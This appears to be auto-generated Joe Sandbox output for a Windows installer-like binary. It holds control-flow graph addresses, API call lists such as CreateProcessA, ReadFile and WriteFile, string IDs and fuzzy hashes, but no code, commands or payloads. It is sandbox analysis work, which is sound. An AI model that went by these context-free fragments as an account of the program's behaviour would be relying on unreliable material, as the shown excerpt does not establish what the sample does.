                                                            control_flow_graph 6824 6cc2cad3-6cc2cae3 6825 6cc2cae5-6cc2caf8 call 6cc1f9df call 6cc1f9cc 6824->6825 6826 6cc2cafd-6cc2caff 6824->6826 6840 6cc2ce7c 6825->6840 6827 6cc2ce64-6cc2ce71 call 6cc1f9df call 6cc1f9cc 6826->6827 6828 6cc2cb05-6cc2cb0b 6826->6828 6845 6cc2ce77 call 6cc20120 6827->6845 6828->6827 6830 6cc2cb11-6cc2cb37 6828->6830 6830->6827 6834 6cc2cb3d-6cc2cb46 6830->6834 6837 6cc2cb60-6cc2cb62 6834->6837 6838 6cc2cb48-6cc2cb5b call 6cc1f9df call 6cc1f9cc 6834->6838 6843 6cc2ce60-6cc2ce62 6837->6843 6844 6cc2cb68-6cc2cb6b 6837->6844 6838->6845 6846 6cc2ce7f-6cc2ce82 6840->6846 6843->6846 6844->6843 6848 6cc2cb71-6cc2cb75 6844->6848 6845->6840 6848->6838 6851 6cc2cb77-6cc2cb8e 6848->6851 6853 6cc2cb90-6cc2cb93 6851->6853 6854 6cc2cbdf-6cc2cbe5 6851->6854 6857 6cc2cba3-6cc2cba9 6853->6857 6858 6cc2cb95-6cc2cb9e 6853->6858 6855 6cc2cbe7-6cc2cbf1 6854->6855 6856 6cc2cbab-6cc2cbc2 call 6cc1f9df call 6cc1f9cc call 6cc20120 6854->6856 6861 6cc2cbf3-6cc2cbf5 6855->6861 6862 6cc2cbf8-6cc2cc16 call 6cc247f5 call 6cc247bb * 2 6855->6862 6890 6cc2cd97 6856->6890 6857->6856 6859 6cc2cbc7-6cc2cbda 6857->6859 6863 6cc2cc63-6cc2cc73 6858->6863 6859->6863 6861->6862 6894 6cc2cc33-6cc2cc5c call 6cc2ac69 6862->6894 6895 6cc2cc18-6cc2cc2e call 6cc1f9cc call 6cc1f9df 6862->6895 6865 6cc2cd38-6cc2cd41 call 6cc319e5 6863->6865 6866 6cc2cc79-6cc2cc85 6863->6866 6877 6cc2cd43-6cc2cd55 6865->6877 6878 6cc2cdb4 6865->6878 6866->6865 6870 6cc2cc8b-6cc2cc8d 6866->6870 6870->6865 6874 6cc2cc93-6cc2ccb7 6870->6874 6874->6865 6879 6cc2ccb9-6cc2cccf 6874->6879 6877->6878 6884 6cc2cd57-6cc2cd66 GetConsoleMode 6877->6884 6882 6cc2cdb8-6cc2cdd0 ReadFile 6878->6882 6879->6865 6885 6cc2ccd1-6cc2ccd3 6879->6885 6888 6cc2cdd2-6cc2cdd8 6882->6888 6889 6cc2ce2c-6cc2ce37 GetLastError 6882->6889 6884->6878 6891 6cc2cd68-6cc2cd6c 6884->6891 6885->6865 6886 6cc2ccd5-6cc2ccfb 6885->6886 6886->6865 6893 6cc2ccfd-6cc2cd13 6886->6893 6888->6889 6898 6cc2cdda 6888->6898 6896 6cc2ce50-6cc2ce53 6889->6896 6897 6cc2ce39-6cc2ce4b call 6cc1f9cc call 6cc1f9df 6889->6897 6892 6cc2cd9a-6cc2cda4 call 6cc247bb 6890->6892 6891->6882 6899 6cc2cd6e-6cc2cd88 ReadConsoleW 6891->6899 6892->6846 6893->6865 6901 6cc2cd15-6cc2cd17 6893->6901 6894->6863 6895->6890 6908 6cc2cd90-6cc2cd96 call 6cc1f9f2 6896->6908 6909 6cc2ce59-6cc2ce5b 6896->6909 6897->6890 6905 6cc2cddd-6cc2cdef 6898->6905 6906 6cc2cd8a GetLastError 6899->6906 6907 6cc2cda9-6cc2cdb2 6899->6907 6901->6865 6911 6cc2cd19-6cc2cd33 6901->6911 6905->6892 6915 6cc2cdf1-6cc2cdf5 6905->6915 6906->6908 6907->6905 6908->6890 6909->6892 6911->6865 6919 6cc2cdf7-6cc2ce07 call 6cc2cefe 6915->6919 6920 6cc2ce0e-6cc2ce19 6915->6920 6932 6cc2ce0a-6cc2ce0c 6919->6932 6925 6cc2ce25-6cc2ce2a call 6cc2d1b6 6920->6925 6926 6cc2ce1b call 6cc2ce83 6920->6926 6930 6cc2ce20-6cc2ce23 6925->6930 6926->6930 6930->6932 6932->6892
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8Q
                                                            • API String ID: 0-4022487301
                                                            • Opcode ID: 8a59b887585a5d900e154537a261bf8ac5cbbcc01f0a126032ef5e9d32ff6a9e
                                                            • Instruction ID: 953a546f61980a9ddb947b7829fc2719d3195a0cde55fa139997717c6c68b1fd
                                                            • Opcode Fuzzy Hash: 8a59b887585a5d900e154537a261bf8ac5cbbcc01f0a126032ef5e9d32ff6a9e
                                                            • Instruction Fuzzy Hash: 85C11870E04249AFFF01EF99C880BADBBB1BF4A318F204159E514A7B81E779D945CB60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6933 6cc3406c-6cc3409c call 6cc344ec 6936 6cc340b7-6cc340c3 call 6cc3160c 6933->6936 6937 6cc3409e-6cc340a9 call 6cc1f9df 6933->6937 6943 6cc340c5-6cc340da call 6cc1f9df call 6cc1f9cc 6936->6943 6944 6cc340dc-6cc34125 call 6cc34457 6936->6944 6942 6cc340ab-6cc340b2 call 6cc1f9cc 6937->6942 6954 6cc34391-6cc34395 6942->6954 6943->6942 6952 6cc34192-6cc3419b GetFileType 6944->6952 6953 6cc34127-6cc34130 6944->6953 6958 6cc341e4-6cc341e7 6952->6958 6959 6cc3419d-6cc341ce GetLastError call 6cc1f9f2 CloseHandle 6952->6959 6956 6cc34132-6cc34136 6953->6956 6957 6cc34167-6cc3418d GetLastError call 6cc1f9f2 6953->6957 6956->6957 6962 6cc34138-6cc34165 call 6cc34457 6956->6962 6957->6942 6960 6cc341f0-6cc341f6 6958->6960 6961 6cc341e9-6cc341ee 6958->6961 6959->6942 6970 6cc341d4-6cc341df call 6cc1f9cc 6959->6970 6966 6cc341fa-6cc34248 call 6cc317b0 6960->6966 6967 6cc341f8 6960->6967 6961->6966 6962->6952 6962->6957 6976 6cc34267-6cc3428f call 6cc34710 6966->6976 6977 6cc3424a-6cc34256 call 6cc34666 6966->6977 6967->6966 6970->6942 6982 6cc34291-6cc34292 6976->6982 6983 6cc34294-6cc342d5 6976->6983 6977->6976 6984 6cc34258 6977->6984 6985 6cc3425a-6cc34262 call 6cc2b925 6982->6985 6986 6cc342d7-6cc342db 6983->6986 6987 6cc342f6-6cc34304 6983->6987 6984->6985 6985->6954 6986->6987 6989 6cc342dd-6cc342f1 6986->6989 6990 6cc3430a-6cc3430e 6987->6990 6991 6cc3438f 6987->6991 6989->6987 6990->6991 6993 6cc34310-6cc34343 CloseHandle call 6cc34457 6990->6993 6991->6954 6996 6cc34377-6cc3438b 6993->6996 6997 6cc34345-6cc34371 GetLastError call 6cc1f9f2 call 6cc3171f 6993->6997 6996->6991 6997->6996
                                                            APIs
                                                              • Part of subcall function 6CC34457: CreateFileW.KERNEL32(00000000,00000000,?,6CC34115,?,?,00000000,?,6CC34115,00000000,0000000C), ref: 6CC34474
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC34180
                                                            • __dosmaperr.LIBCMT ref: 6CC34187
                                                            • GetFileType.KERNEL32(00000000), ref: 6CC34193
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3419D
                                                            • __dosmaperr.LIBCMT ref: 6CC341A6
                                                            • CloseHandle.KERNEL32(00000000), ref: 6CC341C6
                                                            • CloseHandle.KERNEL32(6CC2B0D0), ref: 6CC34313
                                                            • GetLastError.KERNEL32 ref: 6CC34345
                                                            • __dosmaperr.LIBCMT ref: 6CC3434C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID: 8Q
                                                            • API String ID: 4237864984-4022487301
                                                            • Opcode ID: a3d1ada0d753bccff26361fe1667ef5edceabd568421fea9ecedb92e7e5ee58f
                                                            • Instruction ID: fbe8e34b92d00ae1972f1b59e373781fc1a1f7a193d925640e2929cabbc688c6
                                                            • Opcode Fuzzy Hash: a3d1ada0d753bccff26361fe1667ef5edceabd568421fea9ecedb92e7e5ee58f
                                                            • Instruction Fuzzy Hash: A6A17932A045648FCF09DF68E851BAE7FB1EB07328F185259E815EF781E7368806CB51

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7002 6cbec1e0-6cbec239 call 6cc16b70 7005 6cbec260-6cbec269 7002->7005 7006 6cbec26b-6cbec270 7005->7006 7007 6cbec2b0-6cbec2b5 7005->7007 7008 6cbec272-6cbec277 7006->7008 7009 6cbec2f0-6cbec2f5 7006->7009 7010 6cbec2b7-6cbec2bc 7007->7010 7011 6cbec330-6cbec335 7007->7011 7016 6cbec27d-6cbec282 7008->7016 7017 6cbec372-6cbec3df WriteFile 7008->7017 7012 6cbec2fb-6cbec300 7009->7012 7013 6cbec431-6cbec448 WriteFile 7009->7013 7018 6cbec407-6cbec41b 7010->7018 7019 6cbec2c2-6cbec2c7 7010->7019 7014 6cbec33b-6cbec340 7011->7014 7015 6cbec489-6cbec4b9 call 6cc1b3a0 7011->7015 7022 6cbec306-6cbec30b 7012->7022 7023 6cbec452-6cbec47f call 6cc1b920 ReadFile 7012->7023 7013->7023 7025 6cbec4be-6cbec4c3 7014->7025 7026 6cbec346-6cbec36d 7014->7026 7015->7005 7027 6cbec288-6cbec28d 7016->7027 7028 6cbec3e9-6cbec3fd WriteFile 7016->7028 7017->7028 7029 6cbec41f-6cbec42c 7018->7029 7020 6cbec2cd-6cbec2d2 7019->7020 7021 6cbec23b-6cbec250 7019->7021 7020->7005 7030 6cbec2d4-6cbec2e7 7020->7030 7033 6cbec253-6cbec258 7021->7033 7022->7005 7032 6cbec311-6cbec32b 7022->7032 7023->7015 7025->7005 7035 6cbec4c9-6cbec4d7 7025->7035 7026->7033 7027->7005 7036 6cbec28f-6cbec2aa 7027->7036 7028->7018 7029->7005 7030->7033 7032->7029 7033->7005 7036->7033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                                                            • API String ID: 0-4100612575
                                                            • Opcode ID: 332cd9c033e5f046ee9396af7efe65d9894527ff34b440469f0c19ab343fa906
                                                            • Instruction ID: 282ca65aef271f5e5c404e66e4dfe2440124253c01692dde192e19d0ab76b4a7
                                                            • Opcode Fuzzy Hash: 332cd9c033e5f046ee9396af7efe65d9894527ff34b440469f0c19ab343fa906
                                                            • Instruction Fuzzy Hash: 4A7149B0209385AFD710DF59C880B5ABBF4FF8AB48F10492EF498D6651D771D8489B93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                                                            • API String ID: 0-174837320
                                                            • Opcode ID: e5d122f88cc3ee804ed9f96aec2616b71f5b0910461f650726de632d2ec252cd
                                                            • Instruction ID: 3026505c43ad5948e4b033fe979258ee6dd4724dfa3b070031e774aeae9672bb
                                                            • Opcode Fuzzy Hash: e5d122f88cc3ee804ed9f96aec2616b71f5b0910461f650726de632d2ec252cd
                                                            • Instruction Fuzzy Hash: A34286B86193828FC754CF29C090A1ABBE1EFD9794F248E1EE5A587B20D734D845CB47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ;T55
                                                            • API String ID: 0-2572755013
                                                            • Opcode ID: 172b689fa60c683253d29df9a80bd7e3f24a0c3c2fa426d55b7aa6064851d0e9
                                                            • Instruction ID: 43bf25db9e88f7614a427931ffb4112bde9bd50d558e96e40cb54477a4dfae35
                                                            • Opcode Fuzzy Hash: 172b689fa60c683253d29df9a80bd7e3f24a0c3c2fa426d55b7aa6064851d0e9
                                                            • Instruction Fuzzy Hash: 9103F471645B018FC728CF68C8D0696B7F3AFD532871D8B2DC0A64BA95DB74B48ACB50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7579 6cc14ff0-6cc15077 CreateProcessA 7580 6cc150ca-6cc150d3 7579->7580 7581 6cc150f0-6cc1510b 7580->7581 7582 6cc150d5-6cc150da 7580->7582 7581->7580 7583 6cc15080-6cc150c2 WaitForSingleObject CloseHandle * 2 7582->7583 7584 6cc150dc-6cc150e1 7582->7584 7583->7580 7584->7580 7585 6cc150e3-6cc15118 7584->7585
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID: D
                                                            • API String ID: 963392458-2746444292
                                                            • Opcode ID: d06bd55a805b0c62f072309d050a0a75e61eb29ac81e3c6b858c3892f5ca2009
                                                            • Instruction ID: fedcb68bfb21d09de621f537dbdbcd60fafe906396717e333681e2b48bd6f378
                                                            • Opcode Fuzzy Hash: d06bd55a805b0c62f072309d050a0a75e61eb29ac81e3c6b858c3892f5ca2009
                                                            • Instruction Fuzzy Hash: 2331027080D3408FE340DF29C19872ABBF0AB8A318F405A1DF49986650E7B5D5898F43

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7587 6cc2bc5e-6cc2bc7a 7588 6cc2bc80-6cc2bc82 7587->7588 7589 6cc2be39 7587->7589 7590 6cc2bca4-6cc2bcc5 7588->7590 7591 6cc2bc84-6cc2bc97 call 6cc1f9df call 6cc1f9cc call 6cc20120 7588->7591 7592 6cc2be3b-6cc2be3f 7589->7592 7593 6cc2bcc7-6cc2bcca 7590->7593 7594 6cc2bccc-6cc2bcd2 7590->7594 7607 6cc2bc9c-6cc2bc9f 7591->7607 7593->7594 7596 6cc2bcd4-6cc2bcd9 7593->7596 7594->7591 7594->7596 7599 6cc2bcea-6cc2bcfb call 6cc2be40 7596->7599 7600 6cc2bcdb-6cc2bce7 call 6cc2ac69 7596->7600 7608 6cc2bd3c-6cc2bd4e 7599->7608 7609 6cc2bcfd-6cc2bcff 7599->7609 7600->7599 7607->7592 7610 6cc2bd50-6cc2bd59 7608->7610 7611 6cc2bd95-6cc2bdb7 WriteFile 7608->7611 7612 6cc2bd01-6cc2bd09 7609->7612 7613 6cc2bd26-6cc2bd32 call 6cc2beb1 7609->7613 7619 6cc2bd85-6cc2bd93 call 6cc2c2c3 7610->7619 7620 6cc2bd5b-6cc2bd5e 7610->7620 7616 6cc2bdc2 7611->7616 7617 6cc2bdb9-6cc2bdbf GetLastError 7611->7617 7614 6cc2bdcb-6cc2bdce 7612->7614 7615 6cc2bd0f-6cc2bd1c call 6cc2c25b 7612->7615 7623 6cc2bd37-6cc2bd3a 7613->7623 7625 6cc2bdd1-6cc2bdd6 7614->7625 7630 6cc2bd1f-6cc2bd21 7615->7630 7624 6cc2bdc5-6cc2bdca 7616->7624 7617->7616 7619->7623 7626 6cc2bd60-6cc2bd63 7620->7626 7627 6cc2bd75-6cc2bd83 call 6cc2c487 7620->7627 7623->7630 7624->7614 7631 6cc2be34-6cc2be37 7625->7631 7632 6cc2bdd8-6cc2bddd 7625->7632 7626->7625 7633 6cc2bd65-6cc2bd73 call 6cc2c39e 7626->7633 7627->7623 7630->7624 7631->7592 7636 6cc2be09-6cc2be15 7632->7636 7637 6cc2bddf-6cc2bde4 7632->7637 7633->7623 7639 6cc2be17-6cc2be1a 7636->7639 7640 6cc2be1c-6cc2be2f call 6cc1f9cc call 6cc1f9df 7636->7640 7641 6cc2bde6-6cc2bdf8 call 6cc1f9cc call 6cc1f9df 7637->7641 7642 6cc2bdfd-6cc2be04 call 6cc1f9f2 7637->7642 7639->7589 7639->7640 7640->7607 7641->7607 7642->7607
                                                            APIs
                                                              • Part of subcall function 6CC2BEB1: GetConsoleCP.KERNEL32(?,6CC2B0D0,?), ref: 6CC2BEF9
                                                            • WriteFile.KERNEL32(?,?,6CC346EC,00000000,00000000,?,00000000,00000000,6CC35AB6,00000000,00000000,?,00000000,6CC2B0D0,6CC346EC,00000000), ref: 6CC2BDAF
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC346EC,6CC2B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC2BDB9
                                                            • __dosmaperr.LIBCMT ref: 6CC2BDFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                            • String ID: 8Q
                                                            • API String ID: 251514795-4022487301
                                                            • Opcode ID: 19ff57af243fa0c68107a317ce1269e06fbed6156164f401522767f99b430446
                                                            • Instruction ID: 978cd74c9a8119b9ef3c6d389000144299aad2b9009586fc2963a4f131569dd8
                                                            • Opcode Fuzzy Hash: 19ff57af243fa0c68107a317ce1269e06fbed6156164f401522767f99b430446
                                                            • Instruction Fuzzy Hash: 89510771E0420AAFEB01DFA9C850BEEBBB9FF05318F140491D501A7A51F738D94587A0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7654 6cc15b90-6cc15b9c 7655 6cc15bdd 7654->7655 7656 6cc15b9e-6cc15ba9 7654->7656 7659 6cc15bdf-6cc15c57 7655->7659 7657 6cc15bab-6cc15bbd 7656->7657 7658 6cc15bbf-6cc15bcc call 6cae01f0 call 6cc20b18 7656->7658 7657->7658 7667 6cc15bd1-6cc15bdb 7658->7667 7661 6cc15c83-6cc15c89 7659->7661 7662 6cc15c59-6cc15c81 7659->7662 7662->7661 7664 6cc15c8a-6cc15d49 call 6cae2250 call 6cae2340 call 6cc19379 call 6cade010 call 6cc17088 7662->7664 7667->7659
                                                            APIs
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC15D31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 323602529-1866435925
                                                            • Opcode ID: 962d112e276b6dae4c271dc9214ec5a887be7c8fa55745e30bcbad97c3b9ca9a
                                                            • Instruction ID: 2e52dab4e84f500076d0f4d45baa839841d146121d83c4df8522bc7b30b754a2
                                                            • Opcode Fuzzy Hash: 962d112e276b6dae4c271dc9214ec5a887be7c8fa55745e30bcbad97c3b9ca9a
                                                            • Instruction Fuzzy Hash: 975133B5900B408FD725CF29C585B97BBF1BB48318F008A2DD8864BF91E775B909CB90

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7699 6cc2b925-6cc2b939 call 6cc315a2 7702 6cc2b93b-6cc2b93d 7699->7702 7703 6cc2b93f-6cc2b947 7699->7703 7706 6cc2b98d-6cc2b9ad call 6cc3171f 7702->7706 7704 6cc2b952-6cc2b955 7703->7704 7705 6cc2b949-6cc2b950 7703->7705 7708 6cc2b973-6cc2b983 call 6cc315a2 CloseHandle 7704->7708 7709 6cc2b957-6cc2b95b 7704->7709 7705->7704 7710 6cc2b95d-6cc2b971 call 6cc315a2 * 2 7705->7710 7716 6cc2b9bb 7706->7716 7717 6cc2b9af-6cc2b9b9 call 6cc1f9f2 7706->7717 7708->7702 7719 6cc2b985-6cc2b98b GetLastError 7708->7719 7709->7708 7709->7710 7710->7702 7710->7708 7721 6cc2b9bd-6cc2b9c0 7716->7721 7717->7721 7719->7706
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC3425F), ref: 6CC2B97B
                                                            • GetLastError.KERNEL32(?,00000000,?,6CC3425F), ref: 6CC2B985
                                                            • __dosmaperr.LIBCMT ref: 6CC2B9B0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2583163307-0
                                                            • Opcode ID: dee9d80c17a8a1027c0b928da6dab82481e0a750a9c2c2fee79b49175c85fc8b
                                                            • Instruction ID: 610643b0b4eb43143dde581ce651eb720d1cfcf4577f4d81ff451850e231c742
                                                            • Opcode Fuzzy Hash: dee9d80c17a8a1027c0b928da6dab82481e0a750a9c2c2fee79b49175c85fc8b
                                                            • Instruction Fuzzy Hash: 81012B33A491201ED301773EA46579D77B94F8773CF294359E91B87AC1FB68C8459390

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7944 6cc20b9c-6cc20ba7 7945 6cc20ba9-6cc20bbc call 6cc1f9cc call 6cc20120 7944->7945 7946 6cc20bbe-6cc20bcb 7944->7946 7956 6cc20c10-6cc20c12 7945->7956 7947 6cc20c06-6cc20c0f call 6cc2ae75 7946->7947 7948 6cc20bcd-6cc20be2 call 6cc20cb9 call 6cc2873e call 6cc29c60 call 6cc2b898 7946->7948 7947->7956 7963 6cc20be7-6cc20bec 7948->7963 7964 6cc20bf3-6cc20bf7 7963->7964 7965 6cc20bee-6cc20bf1 7963->7965 7964->7947 7966 6cc20bf9-6cc20c05 call 6cc247bb 7964->7966 7965->7947 7966->7947
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
